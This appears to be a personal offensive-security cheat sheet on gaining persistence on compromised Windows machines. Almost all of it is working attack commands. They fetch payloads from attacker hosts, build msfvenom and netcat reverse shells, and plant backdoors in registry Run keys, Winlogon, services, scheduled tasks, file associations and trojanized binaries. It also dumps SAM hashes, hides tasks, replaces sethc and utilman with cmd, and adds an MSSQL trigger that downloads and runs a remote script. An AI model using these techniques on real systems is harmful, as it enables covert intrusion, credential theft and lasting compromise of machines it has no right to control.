In the Open
In the Open

Persistence

  • Gain through
    • Startup folder persistence
    • Editing registry keys
    • Scheduled tasks
    • SUID
    • BITS
    • Creating a backdoored service
    • Creat user
    • RDP

Gain Persistence on Windows

  • Browser. Add to trusted sites.
  • Powershell
Invoke-WebRequest http://<attacker-IP>:<attackerPort>/shell.exe -OutFile .\shell2.exe
  • DOSprompt
certutil -urlcache -split -f http://<attacker-IP>:<attacker-Port/shell.exe
  • Use multi/handler on attacker and set PAYLOAD windows/meterpreter/reverse_tcp

Paths to Persistence

  • Put in startup directory
C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  • Put the reverse_shell into %appdata% and add a registry key
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Users\<USER>\AppData\Roaming\backdoor.exe"

Background Intelligence Transfer Service (BITS)

bitsadmin /create __shell__
bitsadmin /addfile __shell__ "http://<attacker-IP>:<attacker-Port>/shell2.exe" "C:\Users\<USER>\Documents\shell2.exe"

bitsadmin /SetNotifyCmdLine 1 cmd.exe  "/c shell2.exe /complete __shell__ | start /B C:\Users\<USER>\Documents\shell2.exe"
bitsadmin /SetMinRetryDelay 30
bitsadmin /resume

Elevate Privileges

  • Create user net user /add <user> <pass>
  • Add to admin group via net localgroup administrators <user> /add
  • Check net localgroup Administrator

More stealthy

  • Backup Operator group is more stealthy, no admin by r/w on files
net localgroup "Backup Operators" <user> /add
net localgroup "Remote Management Users" <user> /add

  • The following two groups are assigned through membership of Backup Operators

    • SeBackupPrivilege, read files
    • SeRestorePrivilege, write files

  • Any local group is stripped of off its admin permissions when logging in via RDP. Therefore disable the following regkey via

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
  • Afterwards, check if Backup Operators is enabled via whoami /groups
  • Backup SAM and SYSTEM via 
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
secretsdump.py -sam sam.bak -system system.bak LOCAL
  • Pass-the-hash via evil-winrm

secedit

  • Get r/w on files through editing a config file
  • Export secedit and open it 
secedit /export /cfg config.inf
  • Add user to the groups
SeBackupPrivilege = [...],<username>
SeRestorePrivilege = [...],<username>
  • Convert the file
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.infk
  • Add the user to the RDP group via net localgroup like before or do
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
  • Add & Click user -> Full Control(All Operations)
  • Set LocalAccountTokenFilterPolicy to 1 like in the section before

Relative ID (RID)

  • UID like in linux
    • Administrator has RID = 500
    • Other interactive users RID >= 1000
  • Get RIDs
 wmic useraccount get name,sid
  • Assign 500 to regular user
 PsExec64.exe -i -s regedit
  • Open HKLM\SAM\SAM\Domains\Account\Users\<0xRID>
  • Search for RID value as hexadecimal value
  • Open the key called F and change effective RID at position 0x30
  • Insert LE hex of 0d500, which is f401

Add to registry

  • Execute on user logon via
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, C:\yadda\shell2.exe" /f

Add a Service

Meterpreter

  • Inside meterpreter load powershell and powershell_shell
New-Service -Name "<SERVICE_NAME>" -BinaryPathName "<PATH_TO_BINARY>" -Description "<SERVICE_DESCRIPTION>" -StartupType "Boot"

Powershell

  • Start a service automatically
sc.exe create SteamUpdater binPath= "net user Administrator Passwd123" start= auto
sc.exe start SteamUpdater
  • Use a service PE instead
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT -f exe-service -o SteamUpdater.exe
  • Modify an existing service
    • Enumerate all the services
sc.exe query state=all

* Info about a specific service, start type should be automatic, service start name should be target user

sc.exe qc <ServiceName>

* Reconfigure

sc.exe config FoundService binPath= "C:\Windows\SteamUpdater.exe" start= auto obj= "LocalSystem"
sc.exe start FoundService

Add Scheduled Task

$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C"\Users\Administrator\Documents\rshell.exe
$B = New-ScheduledTaskTrigger -AtLogOn
$C = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY/SYSTEM" -RunLevel Highest
$D = New-ScheduledTaskSettingsSet
$E = New-ScheduledTask -Action $A -Trigger $B -Principal $C -Settings $D
Register-ScheduledTask ReverseShell -InputObject $E
  • Alternatively via schtasks
schtasks /create /sc minute /mo 1 /tn SteamUpdater /tr "c:\windows\temp\nc.exe -e cmd.exe $ATTACKER_IP $ATTACKER_PORT" /ru SYSTEM

* Check task

schtasks /query /tn SteamUpdater
  • Deleting Security Descriptor of a task to make it invisible. Delete the following key
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\<taskname>\SD

File Backdoor

Mimic PE

msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=$ATTACKER_IP lport=$ATTACKER_PORT -b "\x00" -f exe -o puttyX.exe

Reference Script

  • Recycle shortcut of an app to reference a reverse shell script
    • Right click -> Properties -> Target
  • Reference the the script certainlynobackdoor.ps1 via 
powershell.exe -WindowStyle hidden C:\Windows\System32\certainlynobackdoor.ps1
  • Content of the script certainlynobackdoor.ps1
Start-Process -NoNewWindow "c:\tools\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\System32\calc.exe

File Association

  • Change associated ProgID of a file type inside registry HKLM\Software\Classes\
  • Choose a class and <class>/shell/open/command contains the file to be opened as the first argument %1
  • Chang the argument to a shell script and pass the arg through it
Start-Process -NoNewWindow "c:\windows\temp\nc.exe" "-e cmd.exe $ATTACKER_IP $ATTACKER_PORT"
C:\Windows\system32\NOTEPAD.EXE $args[0]
  • Change command\default to powershell -windowstyle hidden C:\windows\temp\steamupdater.ps1 %1

Persistence via Logon

Startup directories

  • Users' Startup directory under
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  • Startup directory for all users, put the reverse shell here
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Registry Keys

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
  • HKLM\Software\Microsoft\Windows\CurrentVersion\Run

  • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

  • Create Expandable String Value under any of this keys with the value of the reverse shell path

  • HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ loads user profile after authentication is done

    • Either shell or Userinit can be appended with a comma separated command

Logon Scripts

  • userinit.exe checks var UserInitMprLogonScript which cann be used to load logon scripts

  • Create variable UserInitMprLogonScript under HKCU\Environment which gets the reverse shell as a payload

RDP or Login Screen

Sticky Keys

  • Press shift x 5 and C:\Windows\System32\sethc.exe will be executed
  • Take ownership of the binary via
takeown /f c:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
  • Overwrite with cmd.exe 
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

Utilman

  • Ease of access button is clickable at the login screen, it is executed with system privileges
  • Take ownership and overwrite with cmd.exe
takeown /f c:\Windows\System32\utilman.exe
icacls C:\Windows\System32\utilman.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe

Web Shell

  • Default user is iis apppool\defaultapppool

  • Has SeImpersonatePrivilege

  • Download Web Shell

  • Move shell to C:\inetpub\wwwroot on target
  • Get the shell via http://$TARGET_IP/shell.aspx

MSSQL

  • Triggers bind actions such as INSERTs

  • Open Microsoft SQL Server Management Studio

    • Choose windows auth
    • New Query
    • Enable Advance Options via
sp_configure 'Show Advanced Options',1;
RECONFIGURE;
GO

sp_configure 'xp_cmdshell',1;
RECONFIGURE;
GO

* Grant privileges to all users

USE master
GRANT IMPERSONATE ON LOGIN::sa to [Public];

* Change to DB

USE <DATABASE>

* Create trigger

CREATE TRIGGER [sql_backdoor]
ON HRDB.dbo.Employees 
FOR INSERT AS

EXECUTE AS LOGIN = 'sa'
EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"';
  • Trigger the trigger by visiting the site which triggers the trigger through a db call